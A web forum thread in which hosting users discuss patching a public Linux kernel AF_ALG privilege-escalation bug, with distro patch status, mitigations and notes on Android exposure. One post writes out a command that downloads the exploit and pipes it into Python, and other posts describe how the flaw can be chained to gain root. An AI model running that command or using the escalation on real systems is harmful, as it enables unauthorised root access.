Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Register

Quick Links


Shells Virtual Desktop
BMail.ag - Secure Email Service
Server.net
CPLicense.net
VPS Server
Buy VPN
Vultr
VMs for AI
HostDare
HostDare
ReliableSite White-Label Dedicated Hosting for Resellers
InterServer VPS
BMail.ag - Secure Email Service
Best VPN
High-Performance Bare Metal Server Solutions
Karvl.com
Server Mania Cloud Hosting
DataWagon Hosting
AlphaVPS Hosting
Evoxt.com
Clouvider
VPS Hosting with NVMe
Residential IPs in the US & 4G Mobile Proxies in EU & US with Unlimited Bandwidth
ReliableSite White-Label Dedicated Hosting for Resellers
Rabisu - Hosting Solutions
Shells Virtual Desktop

Categories

In this Discussion

Home General
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Public exploit on most Linux distro’s - patching recommended

13

Comments

  • BackboneDirectBackboneDirect Member, Host Rep

    Rebootless method for patching via eBPF

    https://github.com/wgnet/wg.copyfail.patch

    Thanked by 3oloke tenji khalequzzaman
  • emperoremperor Member
    edited May 1

    anyone knows if there is patched kernel update for debian 12 and ubuntu 24.04 ?

  • CloudHopperCloudHopper Member

    @emperor said:
    anyone knows if there is patched kernel update for debian 12 and ubuntu 24.04 ?

    There isn't a patch for Debian 11/12 yet, only Debian 13 is patched so far...and only if you have the security apt repos enabled, (which I believe is default): https://security-tracker.debian.org/tracker/source-package/linux

    Ubuntu 24.04 also appears to be patched because after an update I'm now running kernel v6.8.0-111-generic and the patch should be applied as of v6.8.0-107.107.

    I can't guarantee any of that though, but Wazuh has stopped whining at me about it so I think my Debian 13 and Ubuntu 24.04 instances are patched now

  • emperoremperor Member

    @CloudHopper said: Ubuntu 24.04 also appears to be patched

    Thanks.

  • davidedavide Member
    edited May 1

    So all passwords / auth tokens safely stored on Android phones are public knowledge now.

    :o

    Thanked by 2rpqu CloudHopper
  • MurvMurv Member, Megathread Squad

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    Thanked by 5borkedascii eliphas stable_genius tux avsisp
  • davidedavide Member
    edited May 1

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    I've read so on Wikipedia but the claim narrowly targets GrapheneOS, the SELinux configuration would be up to the phone manufacturer so I suppose there could be vulnerable phones out there.

    It would be cool to run the proof of concept python script on Android but it seems like a mess:

    https://docs.python.org/3/using/android.html
    As a result, the only way you can use Python on Android is in embedded mode – that is, by writing a native Android application, embedding a Python interpreter using libpython, and invoking Python code using the Python embedding API.

  • CloudHopperCloudHopper Member

    @davide said:

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    I've read so on Wikipedia but the claim narrowly targets GrapheneOS, the SELinux configuration would be up to the phone manufacturer so I suppose there could be vulnerable phones out there.

    It would be cool to run the proof of concept python script on Android but it seems like a mess:

    https://docs.python.org/3/using/android.html
    As a result, the only way you can use Python on Android is in embedded mode – that is, by writing a native Android application, embedding a Python interpreter using libpython, and invoking Python code using the Python embedding API.

    I'm not an Android Dev so don't quote me on this, but it sounds to me like sketchy Android apps just got several orders of magnitude more dangerous. From being able to do whatever they can with the permissions you can trick a user into permitting, to requesting some benign permissions to get the install and then rooting the device.

    If that's true it's an enormous clusterfuck because most old and active Android devices will have already stopped getting software updates long before this dropped.

  • olokeoloke Member, Host Rep

    @Murv said:

    @davide said: Android phones

    Android's not really affected by this, AF_ALG is blocked by SELinux in Android

    This is the most nerdy comment I read today.

    Thanks @Murv .

    image

    Thanked by 4Murv beanman109 tux avsisp
  • MurvMurv Member, Megathread Squad
    edited May 1

    @davide said: the SELinux configuration would be up to the phone manufacturer so I suppose there could be vulnerable phones out there

    Technically yeah, but I doubt manufacturers touch the baseline AOSP SELinux rules much.

    @davide said: It would be cool to run the proof of concept python script on Android but it seems like a mess:

    You can actually run Python scripts on Android using Termux

    (Well the embedded setuid payload in PoC would fail cuz it's x64 but I bet the Python script would fail at the first socket(AF_ALG,...) stage regardless)

    Thanked by 2oloke stable_genius
  • jonathanspwjonathanspw Member, Host Rep

    https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/

    Updates are about to roll out to the AlmaLinux production repositories. Identical to the ones currently in testing repos.

    Thanked by 4ChrisMiller oloke MikeA khalequzzaman
  • themewthemew Member

    Debian 12 patched.

    https://security-tracker.debian.org/tracker/CVE-2026-31431

    Thanked by 4emperor hyperblast BasToTheMax khalequzzaman
  • hyperblasthyperblast Member 
    Linux Debian12 6.1.0-45-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.170-1 (2026-04-30) x86_64
  • hyperblasthyperblast Member
    edited May 1

    debian 11 patched.

    Linux debian 5.10.0-41-cloud-amd64 #1 SMP Debian 5.10.251-3 (2026-04-30) x86_64
    Thanked by 1khalequzzaman
  • emperoremperor Member
    edited May 1

    Too bad i have to break 1+ year uptime on irc (Undernet) from KuroIt and AlphaVPS :(

    Thanked by 2oloke ErawanArifNugroho
  • NekoparaNekopara Member

    just restarted all my servers to apply the patch 👍

  • jonathanspwjonathanspw Member, Host Rep

    AlmaLinux patches are live.

    https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/

    Thanked by 1khalequzzaman
  • DeadlyChemistDeadlyChemist Member

    it's pretty useless unless one has a shell already

    i assume this can be used to gain root on other devices? android? routers? other IOT stuff? this could be a win

  • JohnMiller92JohnMiller92 Member

    https://github.com/torvalds/linux/commit/72548b093ee38a6d4f2a19e6ef1948ae05c181f7#diff-1fbe80f89243b343de91b05a4524502fdde4cea000905f6e6576516f467f907a

    "You must be held accountable for the introduction of the backdoor."

    go get em tiger! 😂

    Thanked by 1rpqu
  • hyperblasthyperblast Member
    edited May 2 
    Is this remotely exploitable?→

Not by itself — it requires local code execution as a regular user. Chain it
with anything that gives you that (web RCE landing in an unprivileged service
 account, an SSH foothold, a malicious PR on a CI runner) and you're root.

    https://copy.fail/#faq

  • KnightHiderKnightHider Member

    @nghialele said:
    Too scary I cancelled my vps.

    Installed Windows to be safe.

    Thanked by 1TimboJones
  • KnightHiderKnightHider Member

    @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

  • wii747wii747 Member

    I tried to update my Ubuntu 24.04.4 LTS but it keeps on coming up with

    N: Some packages may have been kept back due to phasing.

  • tentortentor Member, Host Rep

    @KnightHider said:

    @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

    I think any other suid binary with root owner will work

    Thanked by 1CloudHopper
  • CloudHopperCloudHopper Member

    @tentor said:

    @KnightHider said:

    @zed said:
    I just watched the most amusing conversation play out on irc where a gentleman was explaining to the audience how he was safe from this exploit because he's been chmod 700 /usr/bin/su for the last 10 years.

    He's not wrong.

    I think any other suid binary with root owner will work

    Any user who's a member of the docker group is also a good substitute.

    Thanked by 1tentor
  • zedzed Member

    welp.

  • minioptminiopt Member

    An interesting comment from the HackerNews thread:

    As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).

    The algorithm being used in this exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API.

    If you're in charge of the configuration for a Linux kernel, I strongly recommend disabling all CONFIG_CRYPTO_USER_API_* kconfig options. This would have made this bug, and also every past and future AF_ALG bug, unexploitable. In the unlikely event that you find that it breaks any userspace programs on your system, please help migrate them to userspace crypto code! For some it's already been done. But in general, AF_ALG has actually never been used much in the first place, other than in exploits.

    I don't think there's much other option. This sort of userspace API might have been sort of okay many years ago. But it just doesn't stand up in a world with syzbot, LLM-assisted bug discovery, etc.

    https://news.ycombinator.com/item?id=47956312

    Thanked by 7jsg stable_genius eliphas Nekopara Netralex JohnnySac themew
  • DrvDrv Member

    move to openbsd

  • emperoremperor Member

    I guess oracle patched also 8 version, there is new kernel for upgrade

    Thanked by 1oloke
  • amarcamarc Veteran

    From what I gathered if that kernel module is not loaded/available it's not exploitable ? Because on my couple servers Deb12 , Deb13, Ubuntu 24.04 systems these are not loaded and when I run curl https://copy.fail/exp | python3 && su nothing really happens and all I get is some:

    Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
    Thanked by 1oloke
Sign In or Register to comment.